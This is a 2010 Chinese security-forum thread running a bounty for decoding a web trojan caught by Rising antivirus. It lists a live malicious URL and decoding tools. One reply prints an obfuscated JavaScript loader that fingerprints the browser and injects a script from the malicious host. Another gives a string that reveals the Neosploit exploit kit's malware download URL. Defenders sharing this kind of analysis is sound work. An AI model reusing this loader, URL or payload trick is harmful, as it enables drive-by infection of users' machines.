瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第四十九期(已结束)

1   1  /  1  页   跳转

[悬赏] 网马解密悬赏第四十九期(已结束)

网马解密悬赏第四十九期(已结束)



引用:
地址:http://popopo2.com/tre/sena.asp




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/

   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

附件附件:

文件名:sena.rar
下载次数:502
文件类型:application/octet-stream
文件大小:
上传时间:2010-6-7 11:22:33
描述:rar

最后编辑networkedition 最后编辑于 2010-06-09 09:10:02
分享到:
gototop
 

回复:网马解密悬赏第四十九期

这个真不会
gototop
 

回复: 网马解密悬赏第四十九期



var YJ7_k57_Itf;function NtwU6__fi6gk(crypt_key, dec_func){var S6K5dO7S5_8_x = 0;try {if (mdvv) {S6K5dO7S5_8_x = 1;}} catch(e) { }if (S6K5dO7S5_8_x == 0) { return 0; }mdvv = mdvv.replace(/[g-z]/gi, "");YJ7_k57_Itf = clearInterval(YJ7_k57_Itf);var J__0_MHFPY_f4cq = document.getElementById("zd");J__0_MHFPY_f4cq.value = mdvv;eval(dec_func + "(crypt_key)");return 1;}var aMg84SNa6_g_k1w = -1;var SA___Q_3_lj = "01";var W_Oco__m__0t = navigator.appMinorVersion;while((aMg84SNa6_g_k1w = W_Oco__m__0t.indexOf(";SP", aMg84SNa6_g_k1w + 1)) != -1) {var W_3__0__v = W_Oco__m__0t.charAt(aMg84SNa6_g_k1w + 3);if (W_3__0__v == "1")SA___Q_3_lj = "02";else if (W_3__0__v == "2")SA___Q_3_lj = "03";else if (W_3__0__v == "3")SA___Q_3_lj = "04";else if (W_3__0__v == "4")SA___Q_3_lj = "05";else if (W_3__0__v == "5")SA___Q_3_lj = "06";else if (W_3__0__v == "6")SA___Q_3_lj = "07";if (SA___Q_3_lj != "01")break;}if (SA___Q_3_lj == "01" && W_Oco__m__0t.indexOf("Release Candidate", 0) != -1)SA___Q_3_lj = "08";var rkwmn51aemv_61b = "2" + SA___Q_3_lj;var QMKbGg_1_p_sp;if (!(QMKbGg_1_p_sp = navigator.systemLanguage)) {if (!(QMKbGg_1_p_sp = navigator.userLanguage)) {if (!(QMKbGg_1_p_sp = navigator.browserLanguage)) {QMKbGg_1_p_sp = navigator.language;}}}if (QMKbGg_1_p_sp) {QMKbGg_1_p_sp = QMKbGg_1_p_sp.substr(0, 10);var QxLh__UY3_n33cT = "";for(var FK_d_66r_XOfo = 0; FK_d_66r_XOfo < QMKbGg_1_p_sp.length; FK_d_66r_XOfo++) {var p3e4cdmpp = QMKbGg_1_p_sp.charCodeAt(FK_d_66r_XOfo).toString(16);if (p3e4cdmpp < 2)QxLh__UY3_n33cT += "0";QxLh__UY3_n33cT += p3e4cdmpp;}while(QxLh__UY3_n33cT.length < 20) {QxLh__UY3_n33cT += "00";}rkwmn51aemv_61b += "L" + QxLh__UY3_n33cT;}var Y3__aA__r5mvq_n = "nerot";var h3wq6N0_Ug_J = firot;rkwmn51aemv_61b += "K";for(YnuJj5N6j_Y2l_Y = 0; YnuJj5N6j_Y2l_Y < h3wq6N0_Ug_J.length; YnuJj5N6j_Y2l_Y++) {if (h3wq6N0_Ug_J[YnuJj5N6j_Y2l_Y] >= 256) {h3wq6N0_Ug_J[YnuJj5N6j_Y2l_Y] -= 256;}var W_oR15R88o3 = h3wq6N0_Ug_J[YnuJj5N6j_Y2l_Y].toString(16);if (W_oR15R88o3.length < 2) {W_oR15R88o3 = "0" + W_oR15R88o3;}rkwmn51aemv_61b += W_oR15R88o3;}var C_NS3s = document.createElement("script");C_NS3s.setAttribute("type", "text/javascript");C_NS3s.setAttribute("src", "http://popopo2.com/tre/sena.asp/wH228aefebV0100f060006R8efb0cc5102T6e871f51" + rkwmn51aemv_61b);document.body.appendChild(C_NS3s);var tmp = h3wq6N0_Ug_J[0];h3wq6N0_Ug_J[0] = h3wq6N0_Ug_J[3];h3wq6N0_Ug_J[3] = tmp;tmp = h3wq6N0_Ug_J[1];h3wq6N0_Ug_J[1] = h3wq6N0_Ug_J[2];h3wq6N0_Ug_J[2] = tmp;YJ7_k57_Itf = setInterval(function() { NtwU6__fi6gk(h3wq6N0_Ug_J, Y3__aA__r5mvq_n); }, 100);


gototop
 

回复:网马解密悬赏第四十九期

偷懒下……万能密码,只要是neosploit(新版,旧版是eH开头)后面接上这个就是exe地址了
yH8be83defV0100f080006Rfd382d72108Tc7e05db8201l0409303J000006010
本帖被评分 1 次
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT